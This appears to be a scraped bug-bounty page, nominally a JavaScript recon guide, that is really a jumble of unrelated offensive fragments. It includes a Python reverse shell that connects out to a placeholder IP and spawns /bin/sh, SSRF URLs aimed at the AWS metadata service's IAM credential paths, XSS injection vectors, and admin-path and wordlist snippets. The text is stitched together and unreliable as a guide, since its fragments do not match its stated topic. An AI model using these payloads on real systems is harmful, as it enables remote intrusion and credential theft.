This is a simple guide to perform javascript recon in the bugbounty
- The first step is to collect possibly several javascript files (
more files
=more paths,parameters
->more vulns
)
#!/usr/bin/python | |
import socket,subprocess,os; | |
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); | |
s.connect(("<my ip address>",2375)); | |
os.dup2(s.fileno(),0); | |
os.dup2(s.fileno(),1); | |
os.dup2(s.fileno(),2); | |
p=subprocess.call(["/bin/sh","-i"]); |
aw | |
atom | |
atomcat | |
atomsvc | |
ccxml | |
cdmia | |
cdmic | |
cdmid | |
cdmio | |
cdmiq |
## IPv6 Tests | |
http://[::ffff:169.254.169.254] | |
http://[0:0:0:0:0:ffff:169.254.169.254] | |
## AWS | |
# Amazon Web Services (No Header Required) | |
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy | |
http://169.254.169.254/latest/user-data | |
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] |
// ==UserScript== | |
// @name XSSMonkey | |
// @namespace thartm | |
// @description Identifies potential Cross Site Scripting (XSS) sinks in the currently displayed website and provides an easy option to probe them. Based on ph3wl's XSS script. | |
// @include * | |
// @require http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js | |
// ==/UserScript== | |
// | |
// Set your test string here |
.json | |
.1.json | |
.json/a.css | |
.json/a.html | |
.json/a.ico | |
.json/a.png | |
.json/a.gif | |
.json/a.1.json | |
.json;%0aa.css | |
.json;%0aa.html |
/admin | |
/system/console | |
/dav/crx.default | |
/crx | |
/bin/crxde/logs | |
/jcr:system/jcr:versionStorage.json | |
/_jcr_system/_jcr_versionStorage.json | |
/libs/wcm/core/content/siteadmin.html | |
/libs/collab/core/content/admin.html | |
/libs/cq/ui/content/dumplibs.html |
CUSTOM VECTORS | |
"><img src=x onerror=prompt(1);> | |
+123'];alert(1);[[' | |
123',alert(1),' | |
123\",term:alert(1)//\" |
#!/usr/bin/python3 | |
import hashlib | |
import os | |
import argparse | |
import base64 | |
import pyDes | |
import gzip | |
import hmac | |
import requests |
cmd@fb:/tmp|❯ wc -l 33m-subdomain-wordlist.txt
33927885 33m-subdomain-wordlist.txt